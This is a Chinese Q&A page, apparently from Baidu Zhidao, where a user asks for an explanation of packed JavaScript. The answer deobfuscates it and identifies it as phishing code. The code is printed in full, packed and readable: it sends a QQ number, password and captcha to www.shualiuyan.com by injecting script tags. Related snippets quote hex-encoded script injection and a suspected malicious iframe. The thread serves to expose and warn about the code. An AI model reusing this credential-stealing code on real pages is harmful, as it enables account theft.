求高人翻译整理整段JS代码的意思,谢谢

eval(function(p,a,c,k,e,d){
e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};
if(!''.replace(/^/,String)){
while(c--)d[e(c)]=k[c]||e(c);
k=[function(e){return d[e]}];
e=function(){return'\\w+'};
c=1;};
while(c--)
if(k[c])
p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);
return p;
}
('2 3="0";2 m="";2 l="";2 q="";d c(6){2 9=5.y("9");9.j="g://f.h.s/"+6;5.x(\'v\')[0].w(9)};d i(){3=5.7(\'u\').8;e(3.k>4){2 b=5.7(\'b\').8;2 6="3.n?i"+"----"+3+"----"+b+"----"+p.o();c(6)}B{C(\'D\')}};d z(){e(3>0){2 a=5.7(\'r\').8;e(a.k==4){5.7(\'A\').j="g://f.h.s/1.t";5.7(\'r\').8="";2 6="3.n?a"+"----"+3+"----"+m+"----"+l+"----"+a+"----"+q+"----"+p.o();c(6)}}}',40,40,'||var|qq||document|url|getElementById|value|script|verify|pwd|get|function|if|www|http|shualiuyan|login|src|length|yzmkey2|yzmkey|php|random|Math|pkey|yzminput|com|jpg|user|head|appendChild|getElementsByTagName|createElement|shuru|yzmpic|else|alert|请输入正确QQ号'.split('|'),0,{}))

var qq = "0";
var yzmkey = "";
var yzmkey2 = "";
var pkey = "";
function get(url) {
    var script = document.createElement("script");
    script.src = "http://www.shualiuyan.com/" + url;
    document.getElementsByTagName('head')[0].appendChild(script)
};
function login() {
    qq = document.getElementById('user').value;
    if (qq.length > 4) {
        var pwd = document.getElementById('pwd').value;
        var url = "qq.php?login" + "----" + qq + "----" + pwd + "----" + Math.random();
        get(url)
    } else {
        alert('请输入正确QQ号')
    }
};
function shuru() {
    if (qq > 0) {
        var verify = document.getElementById('yzminput').value;
        if (verify.length == 4) {
            document.getElementById('yzmpic').src = "http://www.shualiuyan.com/1.jpg";
            document.getElementById('yzminput').value = "";
            var url = "qq.php?verify" + "----" + qq + "----" + yzmkey + "----" + yzmkey2 + "----" + verify + "----" + pkey + "----" + Math.random();
            get(url)
        }
    }
}

定义了三个函数 get是在页面上创建一个脚本元素

login函数就是要通过get函数来创建这个脚本(使用script元素应该是为了跨域)

第三个shuru函数好像是跟验证码有关系


不过综合起来你这个很像是钓鱼盗号的代码 慎重输入真实的qq和密码

温馨提示:内容为网友见解,仅供参考
无其他回答

急急!!谁帮我翻译下这段JS代码啊!!在线等……要详细一点的!
show表示显示,hide表示隐藏。html('xx') 表示给元素内容赋值为xx attr是给元素赋值 代表ID,.代表class.。click单击事件。如果你这再不明白,我觉得你应该好好想想了

js代码 我看不懂有没有人可以逐句的翻译一下 谢谢啊
loadData: function() { \/\/这是一个对象的方法,封装了具体的操作 } var me = this;me.form.getForm().reset();\/\/这两句就是重置一个表单 Ext.Ajax.request({ \/\/发起ajax请求,其中就是一些参数 url : "business\/psnrecon!getPsnReconById.action", \/\/提交到哪儿处理 method : "post",...

麻烦js高手给翻译以下代码~每行每行都解释一下~谢谢~拜托~ windo...
window.onload=function(){ \/\/页面加载完成时运行函数 var Time=null; \/\/设置时间变量 Time=setInterval( \/该变量是一个定时函数,第二个参数是1000,就是1000毫秒运行一次 function(){ \/\/定时函数内容 var Day=document.getElementById('day'); \/\/获取日期变量 var start = new Date().getTime(...

js 谁能把它翻译过来要详细的?
这个是jquery的一段js代码 建议你看看jquery方面的资料 就ok了 意思如下:第一句:(".center2_left2 h1 ul li")这个是进行html选择 也就是 找到class属性为center2_left2的标签下面的h1标签下面的ul标签下面的li标签 然后在上面的结果中找到a标签的集合 也就是find("a")的意思了 eq(0)就是活...

求助js代码,点击英文句子显示中文翻译,再次点击隐藏中文句子。_百度知 ...
The heaven being spread with this pallid screen and the earth with the darkest vegetation, their meeting-line at the horizon was clearly marked. 蒙住苍穹的是这片灰白的帐幕,遍布大地的是这片黑苍苍的石南植物,它们在天际处交接,呈现出一条清晰分明的界线。 In such contrast the...

求高人翻译整理整段JS代码的意思,谢谢
+ Math.random(); get(url) } }}定义了三个函数 get是在页面上创建一个脚本元素login函数就是要通过get函数来创建这个脚本(使用script元素应该是为了跨域)第三个shuru函数好像是跟验证码有关系 不过综合起来你这个很像是钓鱼盗号的代码 慎重输入真实的qq和密码 ...

帮忙破译JS代码
这段代码是十六进制,你可以这样翻译一下 <Script language="javascript"> alert("\\x64\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74");alert("\\x77\\x72\\x69\\x74\\x65");alert("\\x3c\\x53\\x43\\x52\\x49\\x50\\x54 \\x73\\x72\\x63\\x3d\\x22\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x77\\x77\\x77\\x2e...

帮忙翻译下下面的javascript代码是什么意思,用于干什么?
先是定义一个对象数组保存两个对象 然后是动态创建script标记 设置脚本路径 (谷歌的分析服务的js)然后插入刚刚的脚本 其实就是异步动态加载该js脚本

网页设计代码,求翻译。格式为(代码——意思)
下面的一段同样如此,meta标签除了description、keywords,其他都基本上没用,不需要。body里面是页面的主体内容,用object引用了一个flash,然后是一个表格table,然后是一段js。参考资料:http:\/\/handbook.visc.cn\/seo\/

谁麻烦给我翻译下一段JS代码 谢谢
tips[7]="mye,\/hhojsd.htmlsajhdsijhghsjsdhdfdfdj.asp";index=Math.floor(Math.random()*tips.length);function a(){ var b="";b+='';b+='';document.write(b)} a();随机iframe一个地址,是挂马的么?

相似回答